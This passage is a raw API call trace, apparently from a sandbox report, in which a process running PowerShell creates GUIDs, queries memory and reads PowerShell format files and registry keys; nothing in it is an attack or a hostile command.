[4]=0x88, [5]=0x8, [6]=0xe9, [7]=0x5d))) returned 0x0 [0152.017] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xdd9bda84, Data2=0xc4e4, Data3=0x4e5a, Data4=([0]=0xb2, [1]=0x7b, [2]=0x2f, [3]=0x7a, [4]=0xa1, [5]=0x32, [6]=0xda, [7]=0xa6))) returned 0x0 [0152.017] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x4e25c727, Data2=0x96d0, Data3=0x4780, Data4=([0]=0x81, [1]=0xbf, [2]=0x45, [3]=0xe3, [4]=0x41, [5]=0xae, [6]=0xb6, [7]=0xaa))) returned 0x0 [0152.017] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xb3ba178, Data2=0x5325, Data3=0x411a, Data4=([0]=0xb8, [1]=0x65, [2]=0x58, [3]=0x54, [4]=0x34, [5]=0x9c, [6]=0x35, [7]=0x55))) returned 0x0 [0152.017] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x5f396285, Data2=0xdf23, Data3=0x492a, Data4=([0]=0x9c, [1]=0xa0, [2]=0x79, [3]=0xf2, [4]=0x49, [5]=0x87, [6]=0x75, [7]=0xfc))) returned 0x0 [0152.017] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x64744430, Data2=0x9dca, Data3=0x42e9, Data4=([0]=0x8f, [1]=0x5e, [2]=0x9b, [3]=0x39, [4]=0x6c, [5]=0x37, [6]=0x9c, [7]=0xee))) returned 0x0 [0152.018] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x9ea8405d, Data2=0xd81e, Data3=0x4abd, Data4=([0]=0xb4, [1]=0x34, [2]=0x79, [3]=0x64, [4]=0xd7, [5]=0xb2, [6]=0xa3, [7]=0xe6))) returned 0x0 [0152.018] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x728a6cbe, Data2=0xe4b0, Data3=0x438e, Data4=([0]=0xb5, [1]=0x5f, [2]=0x72, [3]=0xdc, [4]=0xbe, [5]=0xb5, [6]=0x7f, [7]=0xf2))) returned 0x0 [0152.018] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x9c860935, Data2=0xbfa3, Data3=0x4ec3, Data4=([0]=0x84, [1]=0xe1, [2]=0xa5, [3]=0x90, [4]=0xa2, [5]=0xef, [6]=0x10, [7]=0xe7))) returned 0x0 [0152.018] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xb14ba042, Data2=0xa565, Data3=0x44c3, Data4=([0]=0xb7, [1]=0x2a, [2]=0xa0, [3]=0xb, [4]=0xbc, [5]=0x93, [6]=0x31, [7]=0xc2))) returned 0x0 [0152.018] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xb8eef903, Data2=0xdef, Data3=0x4710, Data4=([0]=0xbf, [1]=0xca, [2]=0x6c, [3]=0xdc, [4]=0xef, [5]=0x52, [6]=0x8e, [7]=0xd6))) returned 0x0 [0152.018] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.018] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.020] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.021] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xdc94de39, Data2=0xb191, Data3=0x4fd1, Data4=([0]=0xbf, [1]=0x58, [2]=0x52, [3]=0x34, [4]=0x62, [5]=0x4d, [6]=0xf1, [7]=0xb5))) returned 0x0 [0152.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23dfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0152.022] GetLastError () returned 0x0 [0152.022] SetErrorMode (uMode=0x1) returned 0x1 [0152.022] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0152.022] GetLastError () returned 0x0 [0152.022] GetFileType (hFile=0x34c) returned 0x1 [0152.022] SetErrorMode (uMode=0x1) returned 0x1 [0152.022] GetFileType (hFile=0x34c) returned 0x1 [0152.022] ReadFile (in: hFile=0x34c, lpBuffer=0x2d38bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d38bf0*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.024] GetLastError () returned 0x0 [0152.024] ReadFile (in: hFile=0x34c, lpBuffer=0x2d38bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d38bf0*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.025] GetLastError () returned 0x0 [0152.025] ReadFile (in: hFile=0x34c, lpBuffer=0x2d38bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d38bf0*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.025] GetLastError () returned 0x0 [0152.025] ReadFile (in: hFile=0x34c, lpBuffer=0x2d38bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d38bf0*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.025] GetLastError () returned 0x0 [0152.025] ReadFile (in: hFile=0x34c, lpBuffer=0x2d38bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d38bf0*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.025] GetLastError () returned 0x0 [0152.025] ReadFile (in: hFile=0x34c, lpBuffer=0x2d38bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d38bf0*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.025] GetLastError () returned 0x0 [0152.025] ReadFile (in: hFile=0x34c, lpBuffer=0x2d38bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d38bf0*, lpNumberOfBytesRead=0x23e544*=0x119, lpOverlapped=0x0) returned 1 [0152.025] GetLastError () returned 0x0 [0152.025] ReadFile (in: hFile=0x34c, lpBuffer=0x2d38bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d38bf0*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0152.025] GetLastError () returned 0x0 [0152.026] CloseHandle (hObject=0x34c) returned 1 [0152.026] GetLastError () returned 0x0 [0152.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e0a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0152.026] GetLastError () returned 0x0 [0152.026] SetErrorMode (uMode=0x1) returned 0x1 [0152.026] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d59bec | out: lpFileInformation=0x2d59bec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0152.026] GetLastError () returned 0x0 [0152.026] SetErrorMode (uMode=0x1) returned 0x1 [0152.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0152.026] GetLastError () returned 0x0 [0152.026] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e4c8 | out: phkResult=0x23e4c8*=0x34c) returned 0x0 [0152.026] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x0, lpcbData=0x23e50c*=0x0 | out: lpType=0x23e510*=0x1, lpData=0x0, lpcbData=0x23e50c*=0x56) returned 0x0 [0152.027] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x357e88, lpcbData=0x23e50c*=0x56 | out: lpType=0x23e510*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e50c*=0x56) returned 0x0 [0152.027] RegCloseKey (hKey=0x34c) returned 0x0 [0152.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0152.027] GetLastError () returned 0x0 [0152.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e004, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0152.027] GetLastError () returned 0x0 [0152.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.027] GetLastError () returned 0x0 [0152.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.027] GetLastError () returned 0x0 [0152.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.027] GetLastError () returned 0x0 [0152.028] VirtualQuery (in: lpAddress=0x23d220, lpBuffer=0x23e220, dwLength=0x1c | out: lpBuffer=0x23e220*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.028] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xc1728b0f, Data2=0x4348, Data3=0x4a79, Data4=([0]=0x8a, [1]=0xca, [2]=0xa4, [3]=0x2d, [4]=0xd1, [5]=0xb5, [6]=0xf7, [7]=0x65))) returned 0x0 [0152.028] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.028] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x48a6fcb3, Data2=0xce1a, Data3=0x4af2, Data4=([0]=0xbd, [1]=0x16, [2]=0x5d, [3]=0x9f, [4]=0x76, [5]=0x2f, [6]=0x85, [7]=0x6b))) returned 0x0 [0152.028] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x5e86264, Data2=0x3e41, Data3=0x48a2, Data4=([0]=0xba, [1]=0x43, [2]=0x5e, [3]=0xfb, [4]=0x1e, [5]=0xf8, [6]=0x96, [7]=0xfc))) returned 0x0 [0152.028] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x6860a697, Data2=0x7c6e, Data3=0x4cfb, Data4=([0]=0x9d, [1]=0xd1, [2]=0x95, [3]=0x2f, [4]=0x87, [5]=0xb8, [6]=0xf2, [7]=0xf5))) returned 0x0 [0152.028] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.029] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23dfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0152.029] GetLastError () returned 0x0 [0152.029] SetErrorMode (uMode=0x1) returned 0x1 [0152.029] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0152.029] GetLastError () returned 0x0 [0152.029] GetFileType (hFile=0x34c) returned 0x1 [0152.029] SetErrorMode (uMode=0x1) returned 0x1 [0152.029] GetFileType (hFile=0x34c) returned 0x1 [0152.029] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.032] GetLastError () returned 0x0 [0152.032] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.032] GetLastError () returned 0x0 [0152.033] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.033] GetLastError () returned 0x0 [0152.033] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.033] GetLastError () returned 0x0 [0152.033] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.033] GetLastError () returned 0x0 [0152.033] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.033] GetLastError () returned 0x0 [0152.033] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.033] GetLastError () returned 0x0 [0152.033] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.033] GetLastError () returned 0x0 [0152.034] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.034] GetLastError () returned 0x0 [0152.035] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.035] GetLastError () returned 0x0 [0152.035] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.035] GetLastError () returned 0x0 [0152.035] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.035] GetLastError () returned 0x0 [0152.035] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.035] GetLastError () returned 0x0 [0152.035] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.035] GetLastError () returned 0x0 [0152.036] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.036] GetLastError () returned 0x0 [0152.037] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.037] GetLastError () returned 0x0 [0152.039] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.039] GetLastError () returned 0x0 [0152.039] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.039] GetLastError () returned 0x0 [0152.039] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.039] GetLastError () returned 0x0 [0152.039] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.039] GetLastError () returned 0x0 [0152.039] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.040] GetLastError () returned 0x0 [0152.040] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.040] GetLastError () returned 0x0 [0152.040] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.040] GetLastError () returned 0x0 [0152.040] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.040] GetLastError () returned 0x0 [0152.040] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.040] GetLastError () returned 0x0 [0152.040] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.040] GetLastError () returned 0x0 [0152.041] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.041] GetLastError () returned 0x0 [0152.041] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.041] GetLastError () returned 0x0 [0152.041] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.041] GetLastError () returned 0x0 [0152.041] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.041] GetLastError () returned 0x0 [0152.041] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.041] GetLastError () returned 0x0 [0152.042] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.042] GetLastError () returned 0x0 [0152.045] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.045] GetLastError () returned 0x0 [0152.045] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.045] GetLastError () returned 0x0 [0152.046] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.046] GetLastError () returned 0x0 [0152.046] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.046] GetLastError () returned 0x0 [0152.046] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.046] GetLastError () returned 0x0 [0152.046] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.046] GetLastError () returned 0x0 [0152.046] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.046] GetLastError () returned 0x0 [0152.047] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.047] GetLastError () returned 0x0 [0152.047] ReadFile (in: 